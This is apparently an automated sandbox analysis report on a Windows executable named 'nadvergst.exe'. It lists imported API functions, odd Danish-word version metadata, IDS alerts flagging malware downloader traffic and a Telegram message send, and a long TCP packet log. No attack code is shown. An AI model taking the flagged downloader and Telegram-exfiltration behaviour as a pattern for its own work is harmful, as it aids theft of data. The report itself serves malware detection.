                                                                                                                                                                          USER32.dllCreateWindowExA, EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, GetDC, SystemParametersInfoA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, GetDlgItem, wsprintfA, SetForegroundWindow, ShowWindow, IsWindow, LoadImageA, SetWindowLongA, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, PostQuitMessage, FindWindowExA, SendMessageTimeoutA, SetWindowTextA
                                                                                                                                                                          GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                                                                          SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                                                                                                                                                          ADVAPI32.dllRegCloseKey, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegEnumValueA, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                                                                                                                          COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                                                                                          ole32.dllCoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
                                                                                                                                                                          VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                                                                                                                          Version Infos

                                                                                                                                                                          DescriptionData
                                                                                                                                                                          Commentsforskningslederen phon
                                                                                                                                                                          CompanyNameinfluenzaepidemiens doktoren
                                                                                                                                                                          FileVersion2.4.0.0
                                                                                                                                                                          InternalNamenadvergst.exe
                                                                                                                                                                          LegalCopyrightbimahs weensier spildevandsledningernes
                                                                                                                                                                          LegalTrademarksintensiveringernes
                                                                                                                                                                          Translation0x0409 0x04e4

                                                                                                                                                                          Possible Origin

                                                                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                          EnglishUnited States

                                                                                                                                                                          Network Behavior

                                                                                                                                                                          Suricata IDS Alerts

                                                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                          2025-03-07T16:20:44.422857+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.849690142.250.184.238443TCP
                                                                                                                                                                          2025-03-07T16:20:52.107397+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849692132.226.247.7380TCP
                                                                                                                                                                          2025-03-07T16:20:55.498049+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849692132.226.247.7380TCP
                                                                                                                                                                          2025-03-07T16:20:58.171618+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849694104.21.80.1443TCP
                                                                                                                                                                          2025-03-07T16:20:58.982448+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849695132.226.247.7380TCP
                                                                                                                                                                          2025-03-07T16:21:01.488549+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849696104.21.80.1443TCP
                                                                                                                                                                          2025-03-07T16:21:02.294940+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849697132.226.247.7380TCP
                                                                                                                                                                          2025-03-07T16:21:05.810613+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849699132.226.247.7380TCP
                                                                                                                                                                          2025-03-07T16:21:22.728681+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849708104.21.80.1443TCP
                                                                                                                                                                          2025-03-07T16:21:26.055869+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.849709149.154.167.220443TCP

                                                                                                                                                                          Network Port Distribution

                                                                                                                                                                          TCP Packets

                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                          Mar 7, 2025 16:20:41.291045904 CET49690443192.168.2.8142.250.184.238
                                                                                                                                                                          Mar 7, 2025 16:20:41.291083097 CET44349690142.250.184.238192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:41.291145086 CET49690443192.168.2.8142.250.184.238
                                                                                                                                                                          Mar 7, 2025 16:20:41.306181908 CET49690443192.168.2.8142.250.184.238
                                                                                                                                                                          Mar 7, 2025 16:20:41.306195021 CET44349690142.250.184.238192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:43.630403042 CET44349690142.250.184.238192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:43.630506039 CET49690443192.168.2.8142.250.184.238
                                                                                                                                                                          Mar 7, 2025 16:20:43.631141901 CET44349690142.250.184.238192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:43.631222010 CET49690443192.168.2.8142.250.184.238
                                                                                                                                                                          Mar 7, 2025 16:20:43.702817917 CET49690443192.168.2.8142.250.184.238
                                                                                                                                                                          Mar 7, 2025 16:20:43.702847958 CET44349690142.250.184.238192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:43.703118086 CET44349690142.250.184.238192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:43.703174114 CET49690443192.168.2.8142.250.184.238
                                                                                                                                                                          Mar 7, 2025 16:20:43.706796885 CET49690443192.168.2.8142.250.184.238
                                                                                                                                                                          Mar 7, 2025 16:20:43.752321959 CET44349690142.250.184.238192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:44.422921896 CET44349690142.250.184.238192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:44.423017979 CET44349690142.250.184.238192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:44.423089981 CET49690443192.168.2.8142.250.184.238
                                                                                                                                                                          Mar 7, 2025 16:20:44.423105955 CET49690443192.168.2.8142.250.184.238
                                                                                                                                                                          Mar 7, 2025 16:20:44.424453020 CET49690443192.168.2.8142.250.184.238
                                                                                                                                                                          Mar 7, 2025 16:20:44.424472094 CET44349690142.250.184.238192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:44.450212002 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:44.450259924 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:44.450382948 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:44.450702906 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:44.450716972 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:46.820128918 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:46.820234060 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:46.824032068 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:46.824043989 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:46.824667931 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:46.824731112 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:46.825054884 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:46.868325949 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:49.802748919 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:49.802938938 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:49.815695047 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:49.815865993 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:49.829046965 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:49.829231977 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:49.829240084 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:49.829330921 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:49.897919893 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:49.897979975 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:49.898008108 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:49.898029089 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:49.898041010 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:49.898066998 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:49.898066998 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:49.898123026 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:49.898638010 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:49.898690939 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:49.898696899 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:49.898747921 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:49.902365923 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:49.902475119 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:49.908178091 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:49.908236027 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:49.908241987 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:49.908291101 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:49.920066118 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:49.920119047 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:49.920125008 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:49.920331955 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:49.927817106 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:49.927901983 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:49.927906990 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:49.928102970 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:49.933753014 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:49.933811903 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:49.933832884 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:49.933928013 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:49.945458889 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:49.945632935 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:49.945637941 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:49.945722103 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:49.952147961 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:49.952225924 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:49.952231884 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:49.952282906 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:49.955394983 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:49.955496073 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:49.955501080 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:49.955560923 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:49.970640898 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:49.970730066 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:49.970736980 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:49.970786095 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:49.992701054 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:49.992846966 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:49.992854118 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:49.992908955 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.007409096 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.007734060 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.007744074 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.007937908 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.025585890 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.025665045 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.025681973 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.025687933 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.025716066 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.025785923 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.031250000 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.031352043 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.031358004 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.031409025 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.031414032 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.031470060 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.042285919 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.042373896 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.042383909 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.042469025 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.045897961 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.046375036 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.046382904 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.046479940 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.054588079 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.054636955 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.054650068 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.054769993 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.062094927 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.062211037 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.062218904 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.062311888 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.067971945 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.068023920 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.068030119 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.068126917 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.077090979 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.077157974 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.077164888 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.077224970 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.090094090 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.090385914 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.090393066 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.090473890 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.093473911 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.093724012 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.093729973 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.093791008 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.101062059 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.101236105 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.104827881 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.104897022 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.105050087 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.105050087 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.105057955 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.105110884 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.120333910 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.121182919 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.121193886 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.121319056 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.126390934 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.126461029 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.126467943 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.126534939 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.137721062 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.137799025 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.137808084 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.137860060 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.147664070 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.147774935 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.147782087 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.147854090 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.149239063 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.149306059 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.149353981 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.149435997 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.169949055 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.170018911 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.170027971 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.170079947 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.171503067 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.171564102 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.171576023 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.171626091 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.178976059 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.179059029 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.179065943 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.179116011 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.180603981 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.180644035 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.180696964 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.180844069 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.185961962 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.186017990 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.186024904 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.186075926 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.202199936 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.202259064 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.202266932 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.202318907 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.203639984 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.203689098 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.203694105 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.203769922 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.206306934 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.206357002 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.206362963 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.206418037 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.216435909 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.216505051 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.216515064 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.216636896 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.216799021 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.216859102 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.216862917 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.217089891 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.219562054 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.219692945 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.219697952 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.219782114 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.223968029 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.224217892 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.224225998 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.224332094 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.224759102 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.224893093 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.224898100 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.224981070 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.230304003 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.230370045 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.230389118 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.230396032 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.230482101 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.230482101 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.230482101 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.237384081 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.237451077 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.237481117 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.237529993 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.237535954 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.237600088 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.238744974 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.238898993 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.238904953 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.239058971 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.242436886 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.242564917 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.242571115 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.242621899 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.244182110 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.244270086 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.244421959 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.244609118 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.246459007 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.246526003 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.246546030 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.246695042 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.254189968 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.254277945 CET49691443192.168.2.8172.217.16.193
